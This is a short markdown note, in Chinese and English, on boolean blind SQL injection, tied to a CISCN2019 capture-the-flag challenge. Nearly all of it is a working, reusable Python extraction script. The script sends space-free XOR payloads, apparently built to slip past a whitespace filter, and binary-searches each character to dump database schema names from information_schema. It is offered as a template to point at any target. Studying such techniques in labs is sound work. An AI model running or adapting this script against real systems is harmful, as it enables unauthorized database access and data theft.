布尔盲注.md

参考[CISCN2019 华北赛区 Day2 Web1]Hack World(学习)


One possible reusable script (a "wheel" to adapt per target — set `url` and `false_re` before running):

import requests
import time
import sys

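url = "http://xxx.node4.buuoj.cn:81/search.php"

# Boolean oracle.  `0^(cond)` is XOR against 0 in MySQL, so the injected id is
# 1 when cond holds and 0 when it does not, and the page renders the "true" or
# the "false" row accordingly.  The query is written without any spaces
# (parenthesised subqueries) -- presumably to get past a whitespace filter on
# the target; keep that property if you adapt the template.
fmt = '0^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)'
# Plain substring (not a regex, despite the name) that is present on the page
# if and only if the injected condition is false.  Must be set per target:
# with the placeholder left in, no probe ever matches, every answer reads as
# "true" and the search degenerates to printing chr(127) for every position.
false_re = '<should a string that appears if and only if the result of fmt is false>'

MAX_LEN = 200          # upper bound on the number of positions probed
REQUEST_TIMEOUT = 10   # seconds; a hung target must not stall the loop forever
REQUEST_DELAY = 0.2    # pause between probes so the target is not hammered


def is_false(response_text: str) -> bool:
    """Return True when *response_text* carries the 'condition false' marker."""
    return false_re in response_text


def bisect_char(cond_is_false, pos: int, lo: int = 0, hi: int = 127) -> int:
    """Binary-search the ordinal of the character at 1-based position *pos*.

    ``cond_is_false(pos, mid)`` must report whether ``ord(char) > mid`` is
    false on the target.  Invariant: ``lo <= ord(char) <= hi``.  ``ord('')``
    is 0 in MySQL, so a position past the end of the string resolves to 0.
    Limitation: a value above *hi* collapses to *hi* (127 by default), so a
    non-ASCII result needs a wider range.
    """
    while lo < hi:
        mid = (lo + hi) // 2
        if cond_is_false(pos, mid):  # ord(char) <= mid
            hi = mid
        else:                        # ord(char) > mid
            lo = mid + 1
    return lo


def probe_false(pos: int, mid: int) -> bool:
    """Send one probe for position *pos* / threshold *mid*; True if the condition was false.

    Raises whatever ``requests`` raises on network failure or timeout; the
    caller is expected to restart rather than silently continue with a
    wrong answer.
    """
    payload = fmt % (pos, mid)
    # Explicit keyword + timeout: without a timeout one stalled response
    # hangs the whole extraction.
    response = requests.get(url, params={'id': payload}, timeout=REQUEST_TIMEOUT)
    time.sleep(REQUEST_DELAY)
    return is_false(response.text)


def extract(cond_is_false, max_len: int = MAX_LEN) -> str:
    """Extract the target string character by character, echoing progress to stdout.

    Stops at the first position whose ordinal is 0 (``substr`` past the end
    of the string) or after *max_len* - 1 positions, whichever comes first.
    Returns the recovered string.
    """
    chars = []
    for pos in range(1, max_len):
        code = bisect_char(cond_is_false, pos)
        if code == 0:
            # End of string reached; do not keep probing (and printing NULs)
            # for the remaining positions.
            break
        ch = chr(code)
        chars.append(ch)
        # Stream each character as it lands so a slow run shows progress.
        print(ch, end='')
        sys.stdout.flush()
    return ''.join(chars)


if __name__ == '__main__':
    # Refuse to run against the unconfigured placeholder marker.
    if false_re.startswith('<should'):
        sys.exit("set false_re to the page marker that appears only when the condition is false")
    extract(probe_false)
    print()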

#Web #SQL注入 #布尔盲注